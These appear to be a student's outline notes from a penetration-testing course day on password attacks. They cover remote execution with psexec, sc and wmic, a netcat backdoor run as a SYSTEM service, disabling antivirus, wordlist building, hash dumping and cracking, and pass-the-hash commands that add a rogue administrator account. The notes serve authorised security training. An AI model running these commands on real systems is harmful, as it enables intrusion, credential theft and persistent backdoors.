Expand
-
Collapse
560.4
Day 4: Password attacks
(back to top)
about
Passwords are powerful
cab calloway
announcements
Novak in Holiday 1 from 6-9 tonight
dojosec - Marcus Carey
Running commands on a remote Windows machine
psexec
Sysinternals
net use \\10.10.10.10 /u:falken
or set up null sesson?
net use \\10.10.10.10 "" /u:""
prevents you from having to supply credentials on every psexec command
psexec \\10.10.10.10 ipconfig
psexec \\10.10.10.10 cmd.exe
psexec used to send credentials in cleartext
scheduled task
at
simpler syntax
at \\10.10.10.10 hh:mm a|p command
schtasks
more flexible
schtasks /lots /of /parms
starttime in HH:MM:SS
to run as SYSTEM, replace /u /p with '/ru SYSTEM'
check status
at \\10.10.10.10
schtasks /query /s 10.10.10.10
to make sure scheduler is running
net use \\10.10.10.10 pwd /u:adminuser
sc \\10.10.10.10 query schedule
sc
create as a service
net use setup
sc \\10.10.10.10 create evilsvr binpath= [command]
sc \\10.10.10.10 start evilsvr
runs as SYSTEM
will die after 30 seconds
servifythis util will fix
from inguardians.com
throws the API call to indicate successful service start
or run detached:
"cmd.exe /k [command]"
sc \\10.10.10.10 create evilthing binpath= "cmd.exe /k [command]"
wmic
can create, start, kill processes
run net view to get system list
use wmic /node: to run a command on every system
wmic /node:1.2.3.4 /user:admin /password:1234 process call create [command]
example: use wmic to kill HIPS and AV at the start
use to list what is running, to spot developers or admins
exercise slide 15
set up persistent nc backdoor using sc
runs with SYSTEM privs
use wmic to run nc
run nc detached with -d to avoid window popup
runs with admin privs
note: sometimes when you kill a process, port is not freed up
will free in 10-15 minutes
is there a cmd to free immediately?
password attack
exact same passwords often are used on multiple systems
"sync'd passwords"
note: half the class uses IRC regularly
register with nicserv
widgets on your facebook page
Kevin Johnson's profile
questionnaire widget
gaining access
pentester named Atlas
helped write parts of this course
same passwords as each other too
local sports teams, as leetspeak
c0l0rad0
colorado1
company name as password
pick just one password, try against all users
prevents locking out accounts
FOIA gets you list of e'ees in any goverment agency
formats
LANMAN
case is always upper
dictionaries
custom wordlist: put in likely local passwords
if no account lockout
web applications
lockout turned off to prevent DoS
dictionary generator tool
www.fonlok.com/zijianhuang/kpa
generate wordlist from company website
see slide 32
do wget on entire website
mkdir /tmp/source
cd /tmp/source
wget -r -l 5 http://www.example.com/
pipe through tr to translate space to a newline
cd ..
grep -h -r "" source | tr '[:space:]' '\n' | sort | uniq > wordlist.lst
grep -v '<' wordlist.lst > newlist.lst
cracking
always crack passwords for every system accessed
always add any cracked passwords into dictionary
be careful to clean up after the pentest is over
improving cracking speed
rainbow tables
all possible LANMAN passwords would be 140GB or so
ophcrack uses them
distributed john: djohn
use real machines, not VMs
pricewatch.com
for cheap computer prices
buy many cheap computers, build as crackers
record how long it took to crack passwords (you may be asked)
beware info leakage
copies of pwd files
/etc/passwd, /etc/shadow
SAM backup file
Ntds.dit from AD
john.pot
Googling for hashes
clean up cracked passwords: delete when done
encrypt passwords when in motion across network
don't crack on target system
pwds witout cracking
keylogger
core has an agent
make sure allowed by Rules of Engagement
make sure you remove it !!!
sniff in cleartext
Google is good for password cracking: search for the hash
be careful
don't do from customer's IP: too revealing
password reset policy
dates from when it took over a month to crack a password
account lockout
dangerous
take into account before any password guessing attempt
not an issue with cracking, only with guessing
alockout.dll tool to audit what apps may be locking out accounts
Windows
to show the lockout settings
net accounts
net accounts /domain
administrator account cannot be locked out
therefore, excellent target
use user2sid to find out name assoc with SID 500
UNIX
less likely for lockout to be configured
if done, often done using PAM
see PAM documentation on Linux
grep tally /etc/pam.d/*
see slide 44
get a test account, try pwd guessing to observe lockout
or use the point of contact's account
go against cached passwords on Windows systems
HKLM\SECURITY\CACHE\NL$[1-10]
readable only with local SYSTEM privs
cry using the LSA key, different for every machine
encrypted and salted form of the LANMAN and NT hashes
morning break
assorted turnovers
apples and bananas
cider and orange juice
it's raining outside
THC-hydra
password attack tool
get username with enumeration techniques first
runs on Linux
not configured right on Backtrack (no ssh, etc.)
pw-inspector tool comes with hydra
run against your dictionary file to generate smaller list
trim out passwords that don't meet organization's password policy
not sure if or why this is good to do
by default, Hydra spawns 36 child processes
may work better if you limit number, even to 1
too many may overwhelm the target service
exercise: THC-hydra slide 560.4p52
running hydra
# xhydra
set target IP or list
choose protocol
smb
port 139
smb over netbios over TCP
smbnt
port 445
smb over tcp
pure windows2000+
ssh2
choose port (0 = use default)
pick username(s) and password(s) to try
note that xhydra is conscructing a cmdline for hydra
pwd representation formats
Windows SAM
LANMAN hash
idiotic
pad to 14 chars if less
convert to UPPERCASE
split into two 7 char pieces
use each piece as a DES key to encrypt
[email protected]
#$%
this was discovered, led to Samba
concatenate the two pieces
not salted
AAD3B435B51404EE = hash of blank
NT hash
better in some ways, worse in others
pwd up to 256 chars
case is preserved
full pwd hashed using MD4
not salted
both get stored by default in NT, 2000, XP, 2003
no LANMAN stored in Vista, but still used
admin can dump entire database
user can only dump own
AD
%systemroot%\ntds\ntds.dit
encase or FTK would dump directly from there
we use tools to access the accounts, and pull the hashes out or registry
challenge/response on network
not same as pwd representation
LANMAN challenge/response
client initiates auth
server sends challenge
client responds
pad LANMAN hash to 21 bytes
split into 3 seven byte pieces
Use each piece as DES key to encryhpt challenge
(NTLMv1 does same, except uses NT hash as strating point)
server does not auth to client
replay is possible
no timestamp
attack
sniff both the challenge and the response
guess, cry, and compare which pwds would yield the observed response
NTLMv1
same as LANMAN challenge/response
only difference is which hash is used
NTLMv2
much harder to crack
client initiates auth
server sends challenge
client responds
use NT hash as HMAC-MD5 key to hash the username and domainname
result is called the NTLMv2 OneWay Function (OWF)
response = HMAC-MD5(key=OWF,f(server challenge, timestamp, client challenge, other items))
server also auths to client: bidirectional authentication
see slide 70 ff.
there is a timestamp
we aren't sending username and pwd, just sending the (challenge/response based on the) hash to see if it matches
"the open specification promise" site on MS european disclosures (?)
still possible to crack using sniffed challenge/response, but much harder than NTLMv1
MS Kerberos
UNIX representations
rely on crypt(3) function
input: pwd, salt
crypt routing varies according to version, distro
see slide 72 for table
trad. DES
$1$ means MD5
_ means BSDi extended DES
$2$ or $2a$ means Blowfish
$5$ means SHA-256 (linux)
$6$ means SHA-512 (linux)
DES password scheme
truncate pwd to 8 chars
shrink to 7 bits/char
use this as 56-bit key to DES encrypt
etc.
slide 73
MD5-based
does 1000 MD5 hashing iterations
salt prevents you from building rainbow tables because you'd need a table for every possible salt
obtaining pwd hashes
obtaining *NIX hashes
not usually in /etc/passwd
usually in /etc/shadow
get both, use John's unshadow tool to recombine
obtaining Windows hashes
pwdump family
leaves memory artifacts
can crash, because DLL injection into LSASS
DEP often makes it crash
pwdump2
pwdump3
pwdump3e
pwdump6
fgdump
leaves memory artifacts
used to be a wrapper for pwdump, to shut off AV
from "the fizzgig" of the Foofus group
get on their mailing list
doesn't just dump passwords
also pwd history
check history for similarity (incrementing a number?)
see slide 80: missed something?
meterpreter
no file and print sharing is needed
no memory artifacts
priv module
smb_relay tool to sniff hash off network, schedule a job to shell in
sniff chall/resp off network
easiest way
fgdump exercise slide 84
against local
against falken on 10.10.10.10
see slide 86 on bouncing fgdump off netcat relay
linux: 445 in, 80 out to Windows
windows attack on port 80: will IDS detect?
IDS should:
detect port 80 use
run through all app signatures
lunch break
John the Ripper
by Solar Designer
designed (only) for speed
www.openwall.com/john
pro version is $40
recommend: spend the $40
cracks other types
linux/unix
windows
LANMAN
NT (with patch)
LANMAN chall/response (with patch and OpenSSL)
NTLMv1
others
includes keyweighting
in brute force mode
prefers certain keys on keyboard that are more likely
cracking modes
single crack
use login and GECOS info
wordlist
for dictionary use
including mangling
leetspeak substitution
etc.
external
write your own code
never used?
john.pot
Avian transfer protocol
IP over carrier pigeon
not a Powerpoint file!
john will not load passwords already in john.pot
slide 94
john.rec
pointer to where john is at
written when john crashes or every 10 minutes
hit Ctrl-C twice fast to terminate john without updating john.rec
remove john.pot and john.rec if you want to start fresh
john console
hit spacebar for status
c/s = "combinations per second"
speed
can be compiled to support specific processor types
$ ./john --test
checks speed
real = system without load
distributed cracking
not officially supported
have diffrerent ones do different accounts (but do same salt on same system)
have different ones do different lengths
have each instance write john.pot incl --session=[name]
exercise slide 99 ff.
normal compilation: make linux-x86-any
v 1.7.2
copy src
copy patches
patch -p0 < john-1.7.2-ntlm-alainesp-6.1.diff
move windows pwds to linux using netcat
sherri davidoff
"alien"
philosecurity
daisy duke
runs strings on a memdump
use every string in password list for john
Cain
cracks most password types
many oddball interesting ones
ike-psk
only for aggressive mode, because then pwd is cleartext
website: cifvicious
VoIP cracking tools
Cain sniffer
SIP/RTP
CIF/VoIP string
can play back audio
wireshark can do that too
VNC
RDP
adrian crenshaw
irongeek
see video on how to use Cain to capture RDP keystrokes
he has scripts to make them readable
Wireless scanner
like netstumbler
SecureID token generator
Box revealer
syskey decoder
double arp cache poisoning
both directions
pretend to be gateway to victim
pretend to be victim to gateway
just click on the IP addresses and "start"
Cain exercise slide 117 ff.
Afternoon break
warm giant pretzels
announcements
food at SANS launch party, Key 9, 7 PM
idiocracy
q.v.
movie I think
same guy who did office space
Rainbow table attacks
idea: pre-create all possible hashes
but doesn't work that way
tahe advantage of "time-memory tradeoff"
Paper by Matin Hellmann
www-ee.stanford.edu/~hellman/publications/36.pdf
see slide 132
many pentesters carry
carry 160GB of high quality rainbow tables for LANMAN
some are more efficient than others
requirements
tables
tool that is compatible with the table you have
need the non-salted hashes
getting tables
generate our own
rtgen
www.antsight.com/zsl/rainbowcrack
precomp
part of Ophcrack
shg
SMB Hash Generator
see slide 135 for URL
pre-generated set
free rainbow tables project
www.freerainbowtables.com
Shmoo group
rainbowtables.shmoo.com
Ophcrack has smaller sets for free
Commercial set
Objectif-Securite
creators of Ophcrack
Astalvista.net
Table storage
would need 120TB to start all hashes
Rainbow Tables ignore 99% of hashes that they create
Create a chain (1000s or 1000000s of iterations long)
password hash
reduction function
tweaks a hash to create a new possible password
there are many possible reduction functions
how
start with initial pwd
hash it
perform reduction function to get (nonsensical) pwd 2
say, first 7 of hash is next pwd
hash pwd2
reduction yields pwd 3
Then make lots of chains with different initial passwords
Compare the chains to look for a little overlap as possible
store chains as rainbow tables
use different reduction functions 1,2,3,4 in subsequent steps to limit overlap
To use
get your hash
run a chain based on your hash
compare your chain members with the end pwd of every chain, trying each reduction function on it
if match, pwd is in that chain
reinflate that chain again to find real pwd
tools
Ophcrack
Rainbowcrack
interesting video demos
see slide 144
Ophcrack exercise slide 145
if you have a computer with a lot of RAM, give Ophcrack more memory
make the most powerful PC the password cracking system
use nc to get the sam.txt to the Ophcrack VM
Pass-the-hash attacks
how auth works
send pwd hash to target
target compares the hash with the hash it has
so this is the same as sending pwd in cleartext, except pwd is the hash
much faster than cracking; we are simply going to use the hash
pass-the-hash toolkit
Hernan Ochoa
of Core Security
http://oss.coresecurity.com/projects/pshtoolkit.html
oss.coresecurity.com > Projects > Pshtoolkit
uses Windows to attack Windows
also includes
whosthere.exe
dumps current user's session info
including hashes
from lsass.exe process
walk up to a running system and use
genhash.exe
give it a cleartext password
it generates LANMAN and NT hashes to screen
if know user's password, use this to generate hashes to pass
iam.exe
changes the current user's hash to one supplied on cmdline
hunst through memory of lsass.exe process and changes hash
Samba cannot do pass-the-hash attack
JoMo-kun of Foofus
allows Linux to attack Windows
needs patching
have 2 versions of Samba, one stock, one patched
SAMBA patched to auth using env var SMBHASH with LANMAN:NT, if it is set
$ export SMBHASH="46F25...625AC25265:3FE465...76546"
now use winexe.exe
mount shares
add users
change group memberships
run a program on target
like psexec
pass a hash from an account in the admin group
Use meterpreter to dump the pwd hashes from target
exit technique
seh
structured exception handler
thread
literally kills the thread
process
kills the process meterpreter is in
may bomb the entire box
use exploit, set payload, etc.
set payload of meterpreter, such as windows/meterpreter/bind_tcp
run the exploit
use priv
loads the priv metasploit module
can dump the SAM database of target
hashdump
look for hashes of SID 500 on screen, and use them to set envvar SMBHASH
echo $SMBHASH
to check if ok
export SMBHASH="lanmanhash:nthash"
compile Samba with --smbmount (?)
exercise slide 163
note: meterpreter's "hashdump" command is used to obtain hashes
# cd /home/tools/samba*/source/bin
# ./smbmount //1.1.1.1/c$ /mnt/target -o username=administrator
enter any pwd when prompted, because Foofus patch will substitiute the SMBHASH envvar
# ./net user ADD attacker password -r 1.1.1.1 -U administrator
# ./net rpc group ADDMEM administrators attacker -r 1.1.1.1 -U administrator
to detect: workstation should never SMB communicate with other workstations, only with servers
WPAD
web proxy auto-detection